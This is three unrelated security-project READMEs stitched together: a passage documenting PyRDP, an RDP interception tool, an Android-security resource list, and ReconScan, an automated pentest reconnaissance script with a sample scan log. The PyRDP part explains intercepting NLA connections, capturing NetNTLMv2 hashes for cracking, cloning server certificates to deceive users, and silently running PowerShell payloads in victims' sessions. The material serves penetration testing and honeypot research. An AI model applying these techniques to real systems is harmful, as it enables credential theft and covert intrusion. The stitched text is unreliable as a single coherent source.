This should install the dependencies required to run PyRDP. If you choose to
install without the GUI or ffmpeg dependencies, it will not be possible to use
`pyrdp-player` without headless mode (`--headless`) or `pyrdp-convert` to produce video output.
If you ever want to leave your virtual environment, you can simply deactivate it:
```
deactivate
```
Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell
commands.
### Installing on Windows
The steps are almost the same. There are two additional prerequisites.
1. A working Python environment ([python.org installer recommended](https://www.python.org/downloads/windows/))
2. [Microsoft C++ Build Tools](https://visualstudio.microsoft.com/visual-cpp-build-tools/)
3. [OpenSSL](https://wiki.openssl.org/index.php/Binaries). Make sure it is reachable from your `$PATH`.
Then, create your virtual environment in PyRDP's directory:
```
cd pyrdp
python -m venv venv
```
*DO NOT* use the root PyRDP directory for the virtual environment folder (`python3 -m venv .`). You will make a mess,
and using a directory name like `venv` is more standard anyway.
Before installing the dependencies, you need to activate your virtual environment:
```
venv\Scripts\activate
```
Finally, you can install the project with Pip:
```
python -m pip install -U pip setuptools wheel
pip install -U -e ".[full]"
```
This should install all the dependencies required to run PyRDP.
For example, to open the player:
```
python venv\Scripts\pyrdp-player.py
```
If you ever want to leave your virtual environment, you can simply deactivate it:
```
deactivate
```
Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell
commands.
### Building the Docker Image
First of all, build the image by executing this command at the root of PyRDP (where Dockerfile is located):
```
docker build -t pyrdp .
```
As an alternative we have a slimmer image without the GUI and ffmpeg dependencies:
```
docker build -f Dockerfile.slim -t pyrdp .
```
Afterwards, you can execute PyRDP by invoking the `pyrdp` docker container. See [Usage instructions](#using-pyrdp) and the [Docker specific instructions](#docker-specific-usage-instructions) for details.
Cross-platform builds can be achieved using `buildx`:
```
docker buildx create --name mybuilder --use --platform linux/amd64,linux/arm64
docker buildx inspect --bootstrap
docker buildx build --platform linux/arm,linux/amd64 -t pyrdp -f Dockerfile.slim .
```
## Using PyRDP
### Using the PyRDP Monster-in-the-Middle
Use `pyrdp-mitm.py <ServerIP>` or `pyrdp-mitm.py <ServerIP>:<ServerPort>` to run the MITM.
Assuming you have an RDP server running on `192.168.1.10` and listening on port 3389, you would run:
```
pyrdp-mitm.py 192.168.1.10
```
When running the MITM for the first time a directory called `pyrdp_output/`
will be created relative to the current working directory.
Here is an example layout of that directory:
```
pyrdp_output/
├── certs
│ ├── WinDev2108Eval.crt
│ └── WinDev2108Eval.pem
├── files
│ ├── e91c6a5eb3ca15df5a5cb4cf4ebb6f33b2d379a3a12d7d6de8c412d4323feb4c
├── filesystems
│ ├── Kimberly835337
│ │ └── device1
│ └── Stephen215343
│ ├── device1
│ └── device2
| └── Users/User/3D Objects/desktop.ini
├── logs
│ ├── crawl.json
│ ├── crawl.log
│ ├── mitm.json
│ ├── mitm.log
│ ├── mitm.log.2021-08-26
│ ├── ntlmssp.log
│ ├── player.log
│ └── ssl.log
└── replays
├── rdp_replay_20210826_12-15-33_512_Stephen215343.pyrdp
└── rdp_replay_20211125_12-55-42_352_Kimberly835337.pyrdp
```
* `certs/` contains the certificates generated stored using the `CN` of the certificate as the file name
* `files/` contains all files captured and are deduplicated by saving them using the SHA-256 hash of the content as the filename
* `filesystems/` contains a recreation of the filesystem of the targets classified by session IDs.
To save space on similar sessions, files are symbolic links to the actual files under `files/`.
* `logs/` contains all the various logs with most in both JSON and plaintext formats:
* `crawl`: the file crawler log
* `mitm`: the main MITM log
* `ntlmssp.log`: the captured NetNTLM hashes
* `player.log`: the player log
* `ssl.log`: the TLS master secrets stored in a format compatible with Wireshark
* `replays/` contains all the previously recorded PyRDP sessions with timestamps and session IDs in the filename
#### Specifying the private key and certificate
If key generation didn't work or you want to use a custom key and certificate, you can specify them using the
`-c` and `-k` arguments:
```
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem
```
##### Monster-in-the-Middle Network Level Authentication (NLA) connections
Network Level Authentication (NLA) is a security feature available since Windows Vista that adds security to RDP connections.
NLA relies on the new security support provider CredSSP and is sometimes referred by that name.
A server that enforces NLA is harder to attack.
There are three different strategies that can be used:
* Obtain the server's certificate and private key
* Using a host redirection feature
* Capture the client's NetNTLMv2 hash and crack it
###### Monster-in-the-Middle NLA
If we have access to the server's certificate and private key, we can successfully MITM RDP even if NLA is enforced.
We [documented this attack in our 1.0 release blog post](https://www.gosecure.net/blog/2020/10/20/announcing-pyrdp-1-0/).
Instructions to [extract the RDP certificate and private key](https://github.com/GoSecure/pyrdp/blob/master/docs/cert-extraction.md) are available on our GitHub.
With the certificate and private key accessible, you just need to set the authentication to `ssp` by adding this on the `pyrdp-mitm.py` command-line:
```
--auth ssp -c <certificate.pem> -k <private-key.pem>
```
This will enable the possibility to intercept NLA-enforced connections.
###### Alternative host redirection when NLA enforced by server
![Diagram that explains NLA redirection](docs/nla-redirection.png)
When PyRDP connects to the destination RDP server (1) if that server enforces NLA then PyRDP (2) will replace the connection to go to another host of your chosing (3) instead.
For example, this can be used to redirect to a server that is known not to enforce NLA or it could even redirect to a VM in the control of an attacker.
To enable this feature specify the alternative host's address and port like this:
```
--nla-redirection-host 192.168.1.12 --nla-redirection-port 3389
```
This feature was introduced in PyRDP 1.1.0.
###### Capturing NetNTLMv2 hashes
NetNTLMv2 hashes are useful for an attacker as they can be cracked relatively easily allowing attackers to leverage legitimate RDP access or attempt credentials stuffing.
Starting with version 1.1.0, PyRDP has the ability to capture the client's NetNTLMv2 hashes via an NLA (CredSSP) connection by carrying the negotiation and capturing the NTLMSSP authentication messages.
In version 1.2.0 that support was extended to work even if we don't have the server's certificate and private key meaning that the connection will not be successfully MITM'ed.
This is similar to what [Responder](https://github.com/lgandx/Responder) does with RDP.
The captured NetNTLMv2 hash can be found in the `ntlmssp.log` log file and it's
formatted so cracking tools like [John The Ripper](https://www.openwall.com/john/) or [hashcat](https://hashcat.net/hashcat/) can ingest it.
This technique has been described in details in a blog post: [Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide](https://www.gosecure.net/blog/2022/01/17/capturing-rdp-netntlmv2-hashes-attack-details-and-a-technical-how-to-guide/)
This feature is compatible with `--auth ssp` but incompatible with `--nla-redirection-host`.
#### Connecting to the PyRDP player
If you want to see live RDP connections through the PyRDP player, you will need to specify the IP address and port on which the
player is listening using the `-i` and `-d` arguments. Note: the port argument is optional, the default port is 3000.
```
pyrdp-mitm.py 192.168.1.10 -i 127.0.0.1 -d 3000
```
##### Connecting to a PyRDP player when the MITM is running on a server
If you are running the MITM on a server and still want to see live RDP connections, you should use
[SSH remote port forwarding](https://www.booleanworld.com/guide-ssh-port-forwarding-tunnelling/)
to forward a port on your server to the player's port on your machine. Once this is done, you pass `127.0.0.1` and the forwarded
port as arguments to the MITM. For example, if port 4000 on the server is forwarded to the player's port on your machine,
this would be the command to use:
```
pyrdp-mitm.py 192.168.1.10 -i 127.0.0.1 -d 4000
```
#### Running payloads on new connections
PyRDP has support for running console commands or PowerShell payloads automatically when new connections are made.
Due to the nature of RDP, the process is a bit hackish and is not always 100% reliable. Here is how it works:
1. Wait for the user to be authenticated.
2. Block the client's input / output to hide the payload and prevent interference.
3. Send a fake Windows+R sequence and run `cmd.exe`.
4. Run the payload as a console command and exit the console. If a PowerShell payload is configured, it is run with `powershell -enc <PAYLOAD>`.
5. Wait a bit to allow the payload to complete.
6. Restore the client's input / output.
For this to work, you need to set 3 arguments:
- the payload
- the delay before the payload starts
- the payload's duration
##### Setting the payload
You can use one of the following arguments to set the payload to run:
- `--payload`, a string containing console commands
- `--payload-powershell`, a string containing PowerShell commands
- `--payload-powershell-file`, a path to a PowerShell script
##### Choosing when to start the payload
For the moment, PyRDP does not detect when the user is logged on.
You must give it an amount of time to wait for before running the payload.
After this amount of time has passed, it will send the fake key sequences and expect the payload to run properly.
To do this, you use the `--payload-delay` argument. The delay is in milliseconds.
For example, if you expect the user to be logged in within the first 5 seconds, you would use the following arguments:
```
--payload-delay 5000
```
This could be made more accurate by leveraging some messages exchanged during RDPDR initialization.
See [this issue](https://github.com/GoSecure/pyrdp/issues/98) if you're interested in making this work better.
##### Choosing when to resume normal activity
Because there is no direct way to know when the console has stopped running, you must tell PyRDP how long you want
the client's input / output to be blocked. We recommend you set this to the maximum amount of time you would expect the
console that is running your payload to be visible. In other words, the amount of time you would expect your payload to
complete.
To set the payload duration, you use the `--payload-duration` argument with an amount of time in milliseconds.
For example, if you expect your payload to take up to 5 seconds to complete, you would use the following argument:
```
--payload-duration 5000
```
This will block the client's input / output for 5 seconds to hide the console and prevent interference.
After 5 seconds, input / output is restored back to normal.
#### Other MITM arguments
Run `pyrdp-mitm.py --help` for a full list of arguments.
##### `--no-downgrade`
This argument is useful when running PyRDP in Honeypot scenarios to avoid scanner fingerprinting.
When the switch is enabled, PyRDP will not downgrade unsupported extensions and let the traffic through
transparently. The player will likely not be able to successfully replay video traffic, but the following
supported channels should still be accessible:
- Keystroke recording
- Mouse position updates
- Clipboard access (passively)
- Drive access (passively)
This feature is still a work in progress and some downgrading is currently unavoidable to allow the connection
to be established. The following are currently not affected by this switch and will still be disabled:
- FIPS Encryption
- Non-TLS encryption protocols
- ClientInfo compression
- Virtual Channel compression
**NOTE**: If being able to eventually replay the full session is important, a good solution is to record the raw
RDP traffic using Wireshark and keep the TLS master secrets. Whenever PyRDP adds support for additional extensions,
it would then become possible to extract a valid RDP replay file from the raw network capture.
##### `--transparent`
Tells PyRDP to attempt to spoof the source IP address of the client so that the server sees the real IP
address instead of the MITM one. This option is only useful in certain scenarios where the MITM is physically
a gateway between clients and the server and sees all traffic.
[Specific examples can be found here.](docs/transparent-proxy.md)
**NOTE**: This requires root privileges, only works on Linux and requires manual firewall configuration to ensure
that traffic is routed properly.
##### `--no-gdi`: Disable Accelerated Graphics Pipeline
PyRDP downgrades video to the the most recent graphics pipeline that it supports. This switch explicitly tells the
MITM to not use the [Graphics Device Interface Acceleration][gdi] extensions to stream video. The advantage of this mode
is a significant reduction in required bandwidth for high resolution connections.
Note that some GDI drawing orders are currently unimplemented because they appear to be unused. If you have a replay
which contains any unsupported or untested order, do not hesitate to share it with the project maintainers so that
support can be added as required. (Make sure that the trace does not contain sensitive information)
[gdi]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpegdi/745f2eee-d110-464c-8aca-06fc1814f6ad
### Using the PyRDP Player
Use `pyrdp-player.py` to run the player.
#### Playing a replay file
You can use the menu to open a new replay file: File > Open.
You can also open replay files when launching the player:
```
pyrdp-player.py <FILE1> <FILE2> ...
```
#### Listening for live connections
The player always listens for live connections. By default, the listening port is 3000, but it can be changed:
```
pyrdp-player.py -p <PORT>
```
#### Changing the listening address
By default, the player only listens to connections coming from the local machine. We do not recommend opening up the player
to other machines. If you still want to change the listening address, you can do it with `-b`:
```
pyrdp-player.py -b <ADDRESS>
```
#### Other player arguments
Run `pyrdp-player.py --help` for a full list of arguments.
### Using the PyRDP Certificate Cloner
NOTE: Using this tool is optional.
Since version 1.0 PyRDP generate certificates on-the-fly exactly like this tool would do.
The PyRDP certificate cloner creates a brand new X509 certificate by using the values from an existing RDP server's
certificate. It connects to an RDP server, downloads its certificate, generates a new private key and replaces the
public key and signature of the certificate using the new private key. This can be used in a pentest if, for example,
you're trying to trick a legitimate user into going through your MITM. Using a certificate that looks like a legitimate
certificate could increase your success rate.
#### Cloning a certificate
You can clone a certificate by using `pyrdp-clonecert.py`:
```
pyrdp-clonecert.py 192.168.1.10 cert.pem -o key.pem
```
The `-o` parameter defines the path name to use for the generated private key.
#### Using a custom private key
If you want to use your own private key instead of generating a new one:
```
pyrdp-clonecert.py 192.168.1.10 cert.pem -i input_key.pem
```
#### Other cloner arguments
Run `pyrdp-clonecert.py --help` for a full list of arguments.
### Using PyRDP Convert
`pyrdp-convert` is a helper script that performs several useful conversions from various input formats to various output formats.
The script has the best chance of working on traffic captured by PyRDP due to unsupported RDP protocol features that might be used in a non-intercepted connection.
The following inputs are supported:
- Network Capture (PCAP) with TLS master secrets (less reliable)
- Network Capture (PCAP) in Exported PDUs Layer 7 format (more reliable)
- Replay file generated by PyRDP
The following outputs are supported:
- MP4 video file
- JSON: a sequence of low-level events serialized in JSON format
- Replay file compatible with `pyrdp-player.py`
Encrypted (TLS) network captures require the TLS master secrets to be provided using `--secrets ssl.log`.
```
# Export the session coming client 10.2.0.198 to a .pyrdp file.
pyrdp-convert.py --src 10.2.0.198 --secrets ssl.log -o path/to/output capture.pcap
# Or as an MP4 video
pyrdp-convert.py --src 10.2.0.198 --secrets ssl.log -o path/to/output -f mp4 capture.pcap
# List the sessions in a network trace, along with the decryptable ones.
pyrdp-convert.py --list-only capture.pcap
```
Note that MP4 conversion requires libavcodec and ffmpeg, so this may require extra steps on Windows.
Manually decrypted network traces can be exported from Wireshark by selecting `File > Export PDUs` and selecting `OSI Layer 7`.
First, make sure you configured wireshark to load TLS secrets:
![Configure TLS secrets log](docs/screens/wireshark-tls.png)
Next, export OSI Layer 7 PDUs:
![Export OSI Layer 7](docs/screens/wireshark-export.png)
And optionally, filter down the trace to contain only the conversation(s) of interest by applying a
display filter and clicking `File > Export Specified Packets...`
![Optionally filtering the exported trace](docs/screens/wireshark-export-specified.png)
Now this trace can be used directly in `pyrdp-convert`.
### Configuring PyRDP
Most of the PyRDP configuration is done through command line switches, but it is also possible to use a
configuration file for certain settings such as log configuration.
The default configuration files used by PyRDP are located in [mitm.default.ini](pyrdp/mitm/mitm.default.ini)
and [player.default.ini](pyrdp/player/player.default.ini). Both files are thoroughly documented and can serve
as a basis for further configuration.
In the future there are plans to support other aspects of PyRDP configuration through those configuration files.
### Advanced Usage
#### Using PyRDP as a Library
If you're interested in experimenting with RDP and making your own tools, head over to our
[documentation section](docs/README.md) for more information.
#### Using PyRDP with twistd
The PyRDP MITM component was also implemented as a twistd plugin.
This enables you to run it in debug mode and allows you to get an interactive debugging repl (pdb) if you send a `SIGUSR2` to the twistd process.
See the [twistd documentation](docs/twistd.md) for more information.
#### Using PyRDP with Bettercap
We developped our own Bettercap module, `rdp.proxy`, to monster-in-the-middle all RDP connections
on a given LAN. Check out [this document](docs/bettercap-rdp-mitm.md) for more information.
### Docker Specific Usage Instructions
Since docker restricts the interactions with the host system (filesystem and network), the PyRDP docker image must be run with some parameters depending on your use case. This section documents those parameters.
We refer to the publicly provided docker image but if you [built your own](#building-the-docker-image) replace `gosecure/pyrdp` with the name of your locally built image.
#### Mapping a Listening Port
In most of the monster-in-the-middle cases you will need to map a port of your host into the docker image. This is achieved by the `--publish` (`-p`) parameters applied to `docker run`.
For example, to listen on 3389 (RDP's default port) on all interfaces, use:
```
docker run -p 3389:3389 gosecure/pyrdp pyrdp-mitm.py 192.168.1.10
```
#### Logs and Artifacts Storage
To store the PyRDP output permanently (logs, files, etc.), add the `--volume` (`-v`) option to the previous command. In this example we store the files relatively to the current directory in `pyrdp_output`:
```
docker run -v $PWD/pyrdp_output:/home/pyrdp/pyrdp_output -p 3389:3389 gosecure/pyrdp pyrdp-mitm.py 192.168.1.10
```
Make sure that your destination directory is owned by a user with a UID of 1000, otherwise you will get permission denied errors.
If you are the only non-root user on the system, usually your user will be assigned UID 1000.
#### Logging the host IP address
If you want PyRDP to log the host IP address in its logs, you can set the `HOST_IP` environment variable when using `docker run`:
```
docker run -p 3389:3389 -e HOST_IP=192.168.1.9 gosecure/pyrdp pyrdp-mitm.py 192.168.1.10
```
#### Using the GUI Player in Docker
Using the player will require you to export the `DISPLAY` environment variable from the host to the docker.
This redirects the GUI of the player to the host screen.
You also need to expose the host's network and prevent Qt from using the MIT-SHM X11 Shared Memory Extension.
To do so, add the `-e` and `--net` options to the run command:
```
docker run -e DISPLAY=$DISPLAY -e QT_X11_NO_MITSHM=1 --net=host gosecure/pyrdp pyrdp-player.py
```
Keep in mind that exposing the host's network to docker can compromise the isolation between your container and the host.
If you plan on using the player, X11 forwarding using an SSH connection would be a more secure way.
## PyRDP Lore
* [Introduction blog post](https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera) in which we [demonstrated that we can catch a real threat actor in action](https://www.youtube.com/watch?v=eB7RC9FmL6Q)
* [Talk at NorthSec 2019](https://docs.google.com/presentation/d/1avcn8Sh2b3IE7AA0G9l7Cj5F1pxqizUm98IbXUo2cvY/edit#slide=id.g404b70030f_0_581) where two demos were performed:
* [First demo](https://youtu.be/5JztJzi-m48): credential logging, clipboard stealing, client-side file browsing and a session take-over
* [Second demo](https://youtu.be/bU67tj1RkMA): the execution of cmd or powershell payloads when a client successfully authenticates
* [PyRDP Logo](/docs/pyrdp-logo.png) licensed under CC-BY-SA 4.0.
* [BlackHat USA Arsenal 2019 Slides](https://docs.google.com/presentation/d/17P_l2n-hgCehQ5eTWilru4IXXHnGIRTj4ftoW4BiX5A/edit?usp=sharing)
* [DerbyCon 2019 Slides](https://docs.google.com/presentation/d/1UAiN2EZwDcmBjLe_t5HXB0LzbNclU3nnigC-XM4neIU/edit?usp=sharing) ([Video](https://www.youtube.com/watch?v=zgt3N6Nrnss))
* [Blog: PyRDP on Autopilot](https://www.gosecure.net/blog/2020/02/26/pyrdp-on-autopilot-unattended-credential-harvesting-and-client-side-file-stealing/)
* [Blog: PyRDP 1.0](https://www.gosecure.net/blog/2020/10/20/announcing-pyrdp-1-0/)
* [DefCon 2020 Demo Labs](https://www.youtube.com/watch?v=1q2Eo3x3u0g)
* [Blog: Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide](https://www.gosecure.net/blog/2022/01/17/capturing-rdp-netntlmv2-hashes-attack-details-and-a-technical-how-to-guide/)
## Contributing to PyRDP
See our [contribution guidelines](CONTRIBUTING.md).
## Acknowledgements
PyRDP uses code from the following open-source software:
- [RC4-Python](https://github.com/bozhu/RC4-Python) for the RC4 implementation.
- [rdesktop](https://github.com/rdesktop/rdesktop) for bitmap decompression.
- [rdpy](https://github.com/citronneur/rdpy) for RC4 keys, the bitmap decompression bindings and the base GUI code for
the PyRDP player.
- [FreeRDP](https://github.com/FreeRDP/FreeRDP) for the scan code enumeration.
|
<p align="center">
<img width="200" height="200" src="https://github.com/Ralireza/Android-Security-Teryaagh/blob/main/android-security-teryagh-logo.png">
</p>
<div align="center">
# AST - Android Security Teryaagh :fire:
</div>
<div align="center">
Android security guides, roadmap, tools, docs, courses, write-ups and teryaagh. </br>
</br>
[![telegram-channel](https://img.shields.io/badge/-Telegram-blue)](https://t.me/Andr0idS3c) <a href="https://twitter.com/intent/follow?screen_name=Ralireza11">
<img src="https://img.shields.io/twitter/follow/Ralireza11?style=social&logo=twitter"
alt="follow on Twitter"></a> [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Ralireza/Android-Security-Teryaagh)
[![:heart:](https://img.shields.io/badge/-feel%20free%20to%20contribute-orange)](https://github.com/Ralireza/Android-Security-Teryaagh/network/members)
</div>
# Buy me a coffee :coffee:
USDT[TRON] : TUHFMaHfFqqBa3VVymkBDCFihCo5bNcpMB
# Contents :scroll:
0. [Roadmap](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap)
- [Programing languages](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#programing-languages)
- [Networking](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#networking)
- [Cryptography](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#cryptography)
- [Android Design & Architecture](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#android-design--architecture)
- [Permissions](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#permissions)
- [Application Components](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#application-components)
- [Core Api](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#core-api)
- [Server Interaction](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#server-interaction)
- [Static Analysis](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#static-analysis)
- [Dynamic Analysis](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#dynamic-analysis)
- [Common Attacks](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/00-Roadmap#common-attacks)
1. [Labs](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/01-Labs)
- [Vulnerable APK to hack](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/01-Labs#vulnerable-apk-to-hack)
- [Environment](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/01-Labs#environment)
3. [Writeups](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/02-Writeups)
- [Tutorial](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/02-Writeups#tutorial)
- [Blog](https://github.com/Ralireza/Android-Security-Teryaagh/blob/main/02-Writeups/README.md#blog)
- [CTF](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/02-Writeups#ctf)
- [BugBounty](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/02-Writeups#bugbounty)
5. [Books](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/03-Books)
- [Pentesting](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/03-Books#pentesting)
- [Internals & Low-level](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/03-Books#internals--low-level)
- [Secure coding](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/03-Books#secure-coding)
7. [Courses](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/04-Courses)
8. [Tools](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools)
- [Super Tools](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#super-tools)
- [Static Analysis](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#static-analysis)
- [APK Vulnerability Scanners](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#--apk-vulnerability-scanners)
- [Dynamic Analysis](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#dynamic-analysis)
- [Debuggers](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#--debuggers)
- [Network Analysis](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#--network-analysis)
- [Frida Powered](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#--frida-powered)
- [Online](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#online)
- [Secure coding & Hardening](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/05-Tools#secure-coding--hardening)
10. [Cheatsheet-Checklist](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/06-Cheatsheet%20%26%20Checklist)
11. [Talks](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/07-Talks)
12. [Misc](https://github.com/Ralireza/Android-Security-Teryaagh/tree/main/08-Misc)
# Roadmap :rocket:
![Roadmap](./00-Roadmap/Android-Security-Roadmap.png)
|
# ReconScan
The purpose of this project is to develop scripts that can be useful in the pentesting workflow, be it for VulnHub VMs, CTFs, hands-on certificates, or real-world targets.
The project currently consists of two major components: a script invoking and aggregating the results of existing tools, and a second script for automated analysis of the aforementioned results from the perspective of exploitability.
In terms of real-world pentesting, these scripts are not meant to replace commercial tools such as Nessus or Nexpose, but they can complement it nicely for finding the latest vulnerabilities and their PoC exploits.
## Network reconnaissance
The `recon.py` script runs various open-source tools in order to enumerate the services on a host. Best run under Kali Linux or similar pentesting-oriented distribution with these tools preinstalled and preconfigured.
The flow followed by the script is as follows:
- Scan all TCP/UDP ports with nmap, service detection, minimal amount of scripts:
- If there are unidentified services, try amap.
- For identified software, run vulnerability analysis with `vulnscan.py`
- For identified services, run further analysis:
- HTTP(S): nikto, dirb
- FTP: hydra if requested
- SMB: enum4linux, samrdump, nbtscan
- SSH: hydra if requested
- SNMP: onesixtyone, snmpwalk
- DNS: attempt zone transfer (axfr) with dig
- Additionally, all nmap scripts are run for the following services:
- HTTP(S), SMTP, POP3, IMAP, FTP, SMB, MSSQL, MySQL, Oracle, SNMP, RDP, VNC
Results will be dumped into the `results/$ip_address` directory, with the `$port_$service_$tool` file naming scheme. The tools are mostly run simultaneously (unless one depends on the result of another) and the CLI output will be aggregated and tagged by the script, so you will see the progress and dirt found by each running script in real-time.
### Origin
This script is inspired by [Mike Czumak's Recon Scan](http://www.securitysift.com/offsec-pwb-oscp/), which he wrote during his OSCP exam. Many modifications can be found on GitHub, however, I wanted to write a script from scratch, familiarizing myself with each tool and their parameterization, instead of just reusing a bunch of scripts found scattered in various repositories, leaving me none the wiser.
### Usage
usage: recon.py [-h] [-b] [-n] [-p] [-v] [-o OUTPUT] [--nmap NMAP] [--hydra HYDRA]
address [port] [service]
Network reconnaissance tool for enumerating the everliving fuck out of a host.
positional arguments:
address address of the host.
port port of the service, if scanning only one port
service type of the service, when port is specified
optional arguments:
-h, --help show this help message and exit
-b, --bruteforce only bruteforce credentials with hydra
-n, --dry-run does not invoke commands
-p, --parallel runs multiple commands in parallel, if set
-v, --verbose enable verbose output, repeat for more verbosity
-o OUTPUT, --output OUTPUT
output directory for the results
--nmap NMAP additional nmap arguments
--hydra HYDRA additional hydra arguments
#### Example run
$ ./recon.py -v 192.168.1.84
[*] Scanning host 192.168.1.84...
[*] Running task nmap-tcp with nmap -v -sV -sC -T5 -p- -oN "results/192.168.1.84/0_tcp_nmap.txt" -oX "results/192.168.1.84/0_tcp_nmap.xml" 192.168.1.84
[*] Running task nmap-udp with nmap -v -sV --version-intensity 0 -sC -sU -T5 -oN "results/192.168.1.84/0_udp_nmap.txt" -oX "results/192.168.1.84/0_udp_nmap.xml" 192.168.1.84
[*] Service 22/tcp is ssh running OpenSSH version 4.7p1 Debian 8ubuntu1.2
[*] Service 80/tcp is http running Apache httpd version 2.2.8
[*] Service 137/udp is netbios-ns running Microsoft Windows netbios-ns
[*] Service 139/tcp is netbios-ssn running Samba smbd version 3.X - 4.X
[*] Service 445/tcp is netbios-ssn running Samba smbd version 3.0.28a
[*] Starting scan of services...
[*] Scanning service ssh on port 22/tcp...
[*] Scanning service http on port 80/tcp...
[*] Running task nmap-80 with nmap -vv -sV -T5 -Pn -p 80 --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-* -oN "results/192.168.1.84/80_http_nmap.txt" -oX "results/192.168.1.84/80_http_nmap.xml" 192.168.1.84
[*] Running task curl-1-80 with curl -i http://192.168.1.84:80/ -o "results/192.168.1.84/80_http_index.html"
[*] Running task curl-2-80 with curl -i http://192.168.1.84:80/robots.txt -o "results/192.168.1.84/80_http_robots.txt"
[*] Running task dirb-80 with dirb http://192.168.1.84:80 -o "results/192.168.1.84/80_http_dirb.txt" -r
[*] Running task nikto-80 with nikto -h http://192.168.1.84:80 -o "results/192.168.1.84/80_http_nikto.txt"
[*] Scanning service netbios-ns on port 137/udp...
[!] Service netbios-ns has no scanner support.
[*] Scanning service netbios-ssn on port 139/tcp...
[*] Running task nmap-139 with nmap -vv -sV -T5 -Pn -p 139 --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-*,smbv2-enabled.nse -oN "results/192.168.1.84/139_smb_nmap.txt" -oX "results/192.168.1.84/139_smb_nmap.xml" 192.168.1.84
[*] Running task enum4linux-139 with enum4linux -a 192.168.1.84 | tee "results/192.168.1.84/139_smb_enum4linux.txt"
[*] Running task samrdump-139 with python2 /usr/share/doc/python-impacket/examples/samrdump.py 192.168.1.84 139/SMB | tee "results/192.168.1.84/139_smb_samrdump.txt"
[*] Scanning service netbios-ssn on port 445/tcp...
[*] Running task nmap-445 with nmap -vv -sV -T5 -Pn -p 445 --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-*,smbv2-enabled.nse -oN "results/192.168.1.84/445_smb_nmap.txt" -oX "results/192.168.1.84/445_smb_nmap.xml" 192.168.1.84
[*] Running task enum4linux-445 with enum4linux -a 192.168.1.84 | tee "results/192.168.1.84/445_smb_enum4linux.txt"
[*] Running task samrdump-445 with python2 /usr/share/doc/python-impacket/examples/samrdump.py 192.168.1.84 445/SMB | tee "results/192.168.1.84/445_smb_samrdump.txt"
## Vulnerability analysis
The `vulnscan.py` script analyses a specified CPE name to determine whether it has any known vulnerabilities and published exploits.
As input, it takes a CPE name, a full name and version, or a path to an xml-based nmap report, which was generated with service detection. When not providing a CPE name, the free-text provided will be fuzzy-matched with the CPE dictionary to check if the provided software name and version has a CPE name. When an nmap report is provided, the CPE names for the identified services are used for the lookup. If the software name and version is available, but the CPE name is not, it will try to fuzzy-match it.
Based on my previous experiences, directly looking up the affected software entries in the CVE database does not always yield the most accurate results, as a software might have multiple CPE names, all referring to the same software. For example, `nginx` might be listed as `cpe:/a:nginx:nginx` or `cpe:/a:igor_sysoev:nginx`, and on the more extreme side, `X11` has 12 CPE aliases. In order to combat this, a CPE alias list is used, which is provided and maintained by the Debian Security team, and all aliases are looked up for a given CPE name. Using this technique tends to generate much better results.
Vulnerabilites are listed and color-coded based on availability:
* gray - no public known exploit,
* yellow - partially public or limited information,
* red - public exploit available.
